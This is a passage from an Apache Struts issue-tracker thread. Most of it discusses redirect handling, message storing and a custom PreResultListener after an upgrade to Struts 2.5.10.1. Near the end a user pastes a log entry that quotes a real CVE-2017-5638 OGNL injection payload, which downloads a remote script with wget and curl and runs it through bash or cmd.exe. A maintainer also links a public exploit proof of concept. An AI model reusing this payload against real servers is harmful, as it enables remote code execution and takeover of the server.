          
          		MyParametersUtil.exportParameters(req, action, BaseActionHome.class);
          		res.setAnchor(anchor);
          
          		res.setLocation(MyParametersUtil.rewriteUrl(req, url));
          
          		res.execute(invocation);
          		invocation.setResultCode(null);
          }
          

          Somehow, if I call redirect on the servletRedirectResult object, then we are able to redirect to the page, but then action messages don't populate. We get IllegalStateException: Committed.

          Can you suggest something here please. We need to close this soon.

          Show
          Charu_R Charu Ramchandani added a comment - Another point to add here is that we have a custom Interceptor which inherits from MessageStoreInterceptor class, and wherein we are registering a custom PreResultListener before invoking super.intercept(), i.e., MyCustomInterceptor.java // Some comments here @Override public String intercept(ActionInvocation invocation) throws Exception { { invocation.addPreResultListener( new MyCustomPreResultListener()); return super .intercept(); } and here is the listener MyCustomPreResultListener.java // Some comments here @Override public String intercept(ActionInvocation invocation) throws Exception { { invocation.addPreResultListener( new MyCustomPreResultListener()); return super .intercept(); } and MyCustomPreResultListener.java @Override public void beforeResult(ActionInvocation invocation, String resultCode) { // If in a page fragment if (!Strings.isNullOrEmpty(resultCode) && invocation instanceof DefaultActionInvocation && invocation.getAction() instanceof BaseAction) { try { final DefaultActionInvocation dai = (DefaultActionInvocation) invocation; final MyBaseAction act = (MyBaseAction) invocation.getAction(); // Instantiate result final Result res = dai.createResult(); if (action.inFragment() && res != null && res instanceof ServletRedirectResult) { final ServletRedirectResult servletRedirectResult = (ServletRedirectResult) res; redirectToPage(invocation, servletRedirectResult.getLocation(), getAnchorFromRedirect(servletRedirectResult), action); } } catch (Exception e) { e.printStackTrace(); } } } getAnchorFromRedirect // uses reflections to read the value of anchor from ServletRedirectResult object, which is coming as null public static void redirectToPage(ActionInvocation invocation, String url, String anchor, MyBaseAction action, ServletRedirectResult res) throws Exception { final HttpServletRequest req = ServletActionContext.getRequest(); res.setStatusCode(204); MyParametersUtil.exportParameters(req, action, BaseActionHome.class); res.setAnchor(anchor); res.setLocation(MyParametersUtil.rewriteUrl(req, url)); res.execute(invocation); invocation.setResultCode( null ); } Somehow, if I call redirect on the servletRedirectResult object, then we are able to redirect to the page, but then action messages don't populate. We get IllegalStateException: Committed. Can you suggest something here please. We need to close this soon.
          Hide
          lukaszlenart Lukasz Lenart added a comment - - edited

          Charu Ramchandani your listener executes result which means the response was already sent back to a client so the MessageStorePreResultListener won't work. And what version of Struts do you use because the latest MessageStorePreResultListener (from Struts 2.5.10.1) can handle already committed response (it won't store messages either but there be no exception)?

          Show
          lukaszlenart Lukasz Lenart added a comment - - edited Charu Ramchandani your listener executes result which means the response was already sent back to a client so the MessageStorePreResultListener won't work. And what version of Struts do you use because the latest MessageStorePreResultListener (from Struts 2.5.10.1) can handle already committed response (it won't store messages either but there be no exception)?
          Hide
          Charu_R Charu Ramchandani added a comment -

          We had this code working for Struts 2.3.1, which didn't had any MessageStorePreResultListener and MessageStoreInterceptor was handling the action messages. Now, with 2.5.10.1 and MessageStorePreResultListener in place, this code is messing up.
          Any thoughts how do we handle this?

          Show
          Charu_R Charu Ramchandani added a comment - We had this code working for Struts 2.3.1, which didn't had any MessageStorePreResultListener and MessageStoreInterceptor was handling the action messages. Now, with 2.5.10.1 and MessageStorePreResultListener in place, this code is messing up. Any thoughts how do we handle this?
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          I have no idea what do you want to achieve with your PreResultListener but it isn't a place to execute results. If you need a dedicated ServletRedirectResult you should implement one instead of doing such nasty hacks.

          Show
          lukaszlenart Lukasz Lenart added a comment - I have no idea what do you want to achieve with your PreResultListener but it isn't a place to execute results. If you need a dedicated ServletRedirectResult you should implement one instead of doing such nasty hacks.
          Hide
          Charu_R Charu Ramchandani added a comment -

          In the custom preresultListener, we are just redirecting to a page in case the action was trigerred on the click of save button (of a form displayed in a pop-up window), whereas the message storing part was handled in the after() function of MessageStoreInterceptor (as in struts 2.3.1).
          Now with the MessageStorPreResultListener in picture how do we handle the redirect part if we leave the message storing to be handled with the new listener.

          Show
          Charu_R Charu Ramchandani added a comment - In the custom preresultListener, we are just redirecting to a page in case the action was trigerred on the click of save button (of a form displayed in a pop-up window), whereas the message storing part was handled in the after() function of MessageStoreInterceptor (as in struts 2.3.1). Now with the MessageStorPreResultListener in picture how do we handle the redirect part if we leave the message storing to be handled with the new listener.
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          As I said, doing such things in a PreResultListener is a bad idea. If you need to change a flow (which action and result will be called) it's better to use an interceptor.

          Show
          lukaszlenart Lukasz Lenart added a comment - As I said, doing such things in a PreResultListener is a bad idea. If you need to change a flow (which action and result will be called) it's better to use an interceptor.
          Hide
          devulapalli upendar added a comment -

          If I remove all my custom listeners and filters , will servlet /struts version 2.5.10.1 will handle redirect(302) ? do I really need to implement a filter/listener to handle redirect ? Please let me know

          Show
          devulapalli upendar added a comment - If I remove all my custom listeners and filters , will servlet /struts version 2.5.10.1 will handle redirect(302) ? do I really need to implement a filter/listener to handle redirect ? Please let me know
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          It handles it right now, the problem is with yours Servlet container configuration and probably with all those hacks you did.

          Show
          lukaszlenart Lukasz Lenart added a comment - It handles it right now, the problem is with yours Servlet container configuration and probably with all those hacks you did.
          Hide
          devulapalli upendar added a comment -

          Where I can see the default struts.xml file mapped for 2.5.10.1 version ? could you help me

          Show
          devulapalli upendar added a comment - Where I can see the default struts.xml file mapped for 2.5.10.1 version ? could you help me
          Hide
          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          So far i've got a working POC with what i intend to do:
          https://obscure-reaches-63654.herokuapp.com/

          I just need to move it into it's own class and package with a proper name.

          Do you want me to create a seperate module inside struts2-extras for them?
          If so, any suggestions for a name for the module?

          Show
          sdutry Stefaan Dutry added a comment - Lukasz Lenart So far i've got a working POC with what i intend to do: https://obscure-reaches-63654.herokuapp.com/ I just need to move it into it's own class and package with a proper name. Do you want me to create a seperate module inside struts2-extras for them? If so, any suggestions for a name for the module?
          Show
          sdutry Stefaan Dutry added a comment - upendar https://github.com/apache/struts/blob/STRUTS_2_5_10_1/core/src/main/resources/struts-default.xml
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          upendar is that what you want? https://github.com/apache/struts/blob/master/core/src/main/resources/struts-default.xml

          Stefaan Dutry yes, please add a new plugin project here https://github.com/apache/struts-extras - no idea how to name it, maybe Struts 2 Custom results plugin ?

          Show
          lukaszlenart Lukasz Lenart added a comment - upendar is that what you want? https://github.com/apache/struts/blob/master/core/src/main/resources/struts-default.xml Stefaan Dutry yes, please add a new plugin project here https://github.com/apache/struts-extras - no idea how to name it, maybe Struts 2 Custom results plugin ?
          Hide
          devulapalli upendar added a comment -

          Stefaan Dutry , Lukasz Lenart , are you adding new plugins with fix to resolve this issue ? once its done can we use that plugin (to use that plugin, we will review the custom filters and listeners what we have)?

          Show
          devulapalli upendar added a comment - Stefaan Dutry , Lukasz Lenart , are you adding new plugins with fix to resolve this issue ? once its done can we use that plugin (to use that plugin, we will review the custom filters and listeners what we have)?
          Hide
          githubbot ASF GitHub Bot added a comment -

          GitHub user sdutry opened a pull request:

          https://github.com/apache/struts-extras/pull/3

          added module for extra result types

          This is still work in progress.

          The reason i'm already having it as pull request is because any input is welcome.

          related to WW-4774

            1. So far
          • `HttpsOffloadAwareServletRedirectResult`
          • checks `X-Forwarded-Proto` header
            1. TODO
          • support official `Forwarded` header
          • `HttpsOffloadAwareServletActionRedirectResult`
          • add `struts-plugin.xml` file with result type definitions
          • add `README.md`

          You can merge this pull request into a Git repository by running:

          $ git pull https://github.com/sdutry/struts-extras httpsfix

          Alternatively you can review and apply these changes as the patch at:

          https://github.com/apache/struts-extras/pull/3.patch

          To close this pull request, make a commit to your master/trunk branch
          with (at least) the following in the commit message:

          This closes #3


          commit 1a64217f87566831864371622673951d29dca79a
          Author: Stefaan Dutry <stefaan.dutry@gmail.com>
          Date: 2017-03-27T21:20:48Z

          added HttpsOffloadAwareServletRedirectResult

          commit 7879bafe58fd7d82d8e31f34dd88736e337f0a12
          Author: Stefaan Dutry <stefaan.dutry@gmail.com>
          Date: 2017-03-27T21:25:40Z

          used spaces for indentation


          Show
          githubbot ASF GitHub Bot added a comment - GitHub user sdutry opened a pull request: https://github.com/apache/struts-extras/pull/3 added module for extra result types This is still work in progress. The reason i'm already having it as pull request is because any input is welcome. related to WW-4774 So far `HttpsOffloadAwareServletRedirectResult` checks `X-Forwarded-Proto` header TODO support official `Forwarded` header `HttpsOffloadAwareServletActionRedirectResult` add `struts-plugin.xml` file with result type definitions add `README.md` You can merge this pull request into a Git repository by running: $ git pull https://github.com/sdutry/struts-extras httpsfix Alternatively you can review and apply these changes as the patch at: https://github.com/apache/struts-extras/pull/3.patch To close this pull request, make a commit to your master/trunk branch with (at least) the following in the commit message: This closes #3 commit 1a64217f87566831864371622673951d29dca79a Author: Stefaan Dutry <stefaan.dutry@gmail.com> Date: 2017-03-27T21:20:48Z added HttpsOffloadAwareServletRedirectResult commit 7879bafe58fd7d82d8e31f34dd88736e337f0a12 Author: Stefaan Dutry <stefaan.dutry@gmail.com> Date: 2017-03-27T21:25:40Z used spaces for indentation
          Hide
          devulapalli upendar added a comment -

          Charu has resolved the issue by MyCustomPreResultListener extending MessageStorePreResultListener class and some other changes in that class.

          Thanks much Stefaan Dutry and Lukasz Lenart for your support.

          Show
          devulapalli upendar added a comment - Charu has resolved the issue by MyCustomPreResultListener extending MessageStorePreResultListener class and some other changes in that class. Thanks much Stefaan Dutry and Lukasz Lenart for your support.
          Hide
          lukaszlenart Lukasz Lenart added a comment - - edited

          upendar what does it mean? that your problems with redirecting to HTTPS are gone? Can we close this issue?

          Show
          lukaszlenart Lukasz Lenart added a comment - - edited upendar what does it mean? that your problems with redirecting to HTTPS are gone? Can we close this issue?
          Hide
          devulapalli upendar added a comment -

          Lukasz Lenart Yes the issue is resolved , we are good now. Thanks for your support.

          Show
          devulapalli upendar added a comment - Lukasz Lenart Yes the issue is resolved , we are good now. Thanks for your support.
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          upendar so all those problems were related to a custom PreResultListener?

          Show
          lukaszlenart Lukasz Lenart added a comment - upendar so all those problems were related to a custom PreResultListener ?
          Hide
          devulapalli upendar added a comment -

          Yes. the original implementation with 2.3.1 version in my code base is MyCustomPreResultListener implements PreResultListener. We made change MyCustomPreResultListener extends MessageStorePreResultListener class. Also we are overriding the redirect() method in which ServletRedirectResult res = new ServletRedirectResult(); is re-instantiated instead we are passing the same what we got originally. Let me know if you want full changes to understand better.

          Show
          devulapalli upendar added a comment - Yes. the original implementation with 2.3.1 version in my code base is MyCustomPreResultListener implements PreResultListener. We made change MyCustomPreResultListener extends MessageStorePreResultListener class. Also we are overriding the redirect() method in which ServletRedirectResult res = new ServletRedirectResult(); is re-instantiated instead we are passing the same what we got originally. Let me know if you want full changes to understand better.
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          That's cool, just wanted to be double-sure and let others to find similar issue and solution, thanks

          Show
          lukaszlenart Lukasz Lenart added a comment - That's cool, just wanted to be double-sure and let others to find similar issue and solution, thanks
          Hide
          devulapalli upendar added a comment -

          Lukasz Lenart could you please confirm me struts version 2.3.1 is vulnerable for CVE-2017-5638 or not ?
          is 2.3.32 version is the right fix or struts 2.5.10.1 is the right version to resolve CVE-2017-5638 issue ? Please confirm.

          Show
          devulapalli upendar added a comment - Lukasz Lenart could you please confirm me struts version 2.3.1 is vulnerable for CVE-2017-5638 or not ? is 2.3.32 version is the right fix or struts 2.5.10.1 is the right version to resolve CVE-2017-5638 issue ? Please confirm.
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          As far I know Struts 2.3.1 isn't affected by this vulnerability.

          Show
          lukaszlenart Lukasz Lenart added a comment - As far I know Struts 2.3.1 isn't affected by this vulnerability.
          Hide
          devulapalli upendar added a comment -

          do you have any idea what actually the fix was done to prevent the vulnerability ?

          Show
          devulapalli upendar added a comment - do you have any idea what actually the fix was done to prevent the vulnerability ?
          Show
          lukaszlenart Lukasz Lenart added a comment - https://github.com/apache/struts/commit/352306493971e7d5a756d61780d57a76eb1f519a
          Hide
          devulapalli upendar added a comment - - edited

          Thank you, but we got attacks with struts version 2.3.1 , what could be the reason I see all struts versions 2.3.1 and common-fileupload-1.2.2 and ognl-3.0.3.jar , could you help me to traceout what could be reason for 2.3.1

          Here is the exception stack trace

          WARN org.apache.struts2.dispatcher.multipart.MultiPartRequest (warn:60) - Unable to parse request
          org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http://XXXXX/.jb | perl ; cd /tmp ; curl -O http://xxxxxx/.jb ; fetch http:/xxxxx/.jb ; perl .jb ;rm -rf .jb*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?

          {'cmd.exe','/c',#cmd}

          :

          {'/bin/bash','-c',#cmd}

          )).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
          at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:908)
          at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:331)
          at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:351)
          at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:151)
          at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:90)
          at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:80)
          at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:75)
          at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:740)
          at org.apache.struts2.dispatcher.ng.PrepareOperations.wrapRequest(PrepareOperations.java:131)
          at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:83)
          at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1338)

          Show
          devulapalli upendar added a comment - - edited Thank you, but we got attacks with struts version 2.3.1 , what could be the reason I see all struts versions 2.3.1 and common-fileupload-1.2.2 and ognl-3.0.3.jar , could you help me to traceout what could be reason for 2.3.1 Here is the exception stack trace WARN org.apache.struts2.dispatcher.multipart.MultiPartRequest (warn:60) - Unable to parse request org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm) (#container=#context ['com.opensymphony.xwork2.ActionContext.container'] ).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http://XXXXX/.jb | perl ; cd /tmp ; curl -O http://xxxxxx/.jb ; fetch http:/xxxxx/.jb ; perl .jb ;rm -rf .jb*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin? {'cmd.exe','/c',#cmd} : {'/bin/bash','-c',#cmd} )).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:908) at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:331) at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:351) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:151) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:90) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:80) at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:75) at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:740) at org.apache.struts2.dispatcher.ng.PrepareOperations.wrapRequest(PrepareOperations.java:131) at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:83) at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1338)
          Hide
          devulapalli upendar added a comment -

          Lukasz Lenart , could you please help me for the above query how to trace and whats happened with 3.2.1 version

          Show
          devulapalli upendar added a comment - Lukasz Lenart , could you please help me for the above query how to trace and whats happened with 3.2.1 version
          Hide
          devulapalli upendar added a comment -

          I see some forums talking about the OGNL expression is being evaluated that caused vulnerability ; I dont see buildErrorMessage() method in versin 2.3.1 , also dont see LocalizedMessage class in 2.3.1 then how 2.3.1 is being hacked ? I'm thinking there might be common code which exist even in 2..3.1 that is the actually vulnerable. Please point me the actual code in 2.5.10.1 vs vulnerability code to understand better

          Show
          devulapalli upendar added a comment - I see some forums talking about the OGNL expression is being evaluated that caused vulnerability ; I dont see buildErrorMessage() method in versin 2.3.1 , also dont see LocalizedMessage class in 2.3.1 then how 2.3.1 is being hacked ? I'm thinking there might be common code which exist even in 2..3.1 that is the actually vulnerable. Please point me the actual code in 2.5.10.1 vs vulnerability code to understand better
          Hide
          devulapalli upendar added a comment -

          is commons-fileupload is not contributing to this vulnerability?

          Show
          devulapalli upendar added a comment - is commons-fileupload is not contributing to this vulnerability?
          Hide
          devulapalli upendar added a comment -

          ognl version too

          Show
          devulapalli upendar added a comment - ognl version too
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          This is only a WARN entry in the logs, an expected behaviour when parser couldn't parse incoming request. Did you observe any other hacker activity? Did they install some backdoor/spam/etc?

          You can test your application using one of the available PoCs, e.g. https://github.com/s1kr10s/Struts2Shell

          Show
          lukaszlenart Lukasz Lenart added a comment - This is only a WARN entry in the logs, an expected behaviour when parser couldn't parse incoming request. Did you observe any other hacker activity? Did they install some backdoor/spam/etc? You can test your application using one of the available PoCs, e.g. https://github.com/s1kr10s/Struts2Shell
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user asfgit closed the pull request at:

          https://github.com/apache/struts-extras/pull/3

          Show
          githubbot ASF GitHub Bot added a comment - Github user asfgit closed the pull request at: https://github.com/apache/struts-extras/pull/3
          Hide
          devulapalli upendar added a comment -

          Lukasz Lenart Struts version 2.3.1 is vulnerable and is exploited. The above error shows WARN but that is actually causing vulnerable as we did many exploit scripts after attack and reported as vulnerable.

          We need to understand what actually caused version 2.3.1 vulnerable and error I stated above is same as the error reported in CVE-2017-5638. Please let me know

          Show
          devulapalli upendar added a comment - Lukasz Lenart Struts version 2.3.1 is vulnerable and is exploited. The above error shows WARN but that is actually causing vulnerable as we did many exploit scripts after attack and reported as vulnerable. We need to understand what actually caused version 2.3.1 vulnerable and error I stated above is same as the error reported in CVE-2017-5638. Please let me know
          Hide
          lukaszlenart Lukasz Lenart added a comment -

          I'm not able to confirm this based on my knowledge, please send any additional informations to security@struts.apache.org - this isn't the place to discuss such things.

          Please also notice that the Struts 2.3.1 has other vulnerabilities as mentioned on this page [1], these Security Bulletins refer to the Struts version 2.3.1: S2-008, S2-009, S2-010, S2-011, S2-012, S2-013, S2-014, S2-015, S2-016, S2-017, S2-018, S2-019, S2-020, S2-021, S2-022

          [1] http://struts.apache.org/downloads.html

          Show
          lukaszlenart Lukasz Lenart added a comment - I'm not able to confirm this based on my knowledge, please send any additional informations to security@struts.apache.org - this isn't the place to discuss such things. Please also notice that the Struts 2.3.1 has other vulnerabilities as mentioned on this page [1] , these Security Bulletins refer to the Struts version 2.3.1: S2-008, S2-009, S2-010, S2-011, S2-012, S2-013, S2-014, S2-015, S2-016, S2-017, S2-018, S2-019, S2-020, S2-021, S2-022 [1] http://struts.apache.org/downloads.html
          Hide
          devulapalli upendar added a comment -

          Thank you

          Show
          devulapalli upendar added a comment - Thank you

            People

            • Assignee:
              Unassigned
              Reporter:
              devulapalli upendar
            • Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved:

                Development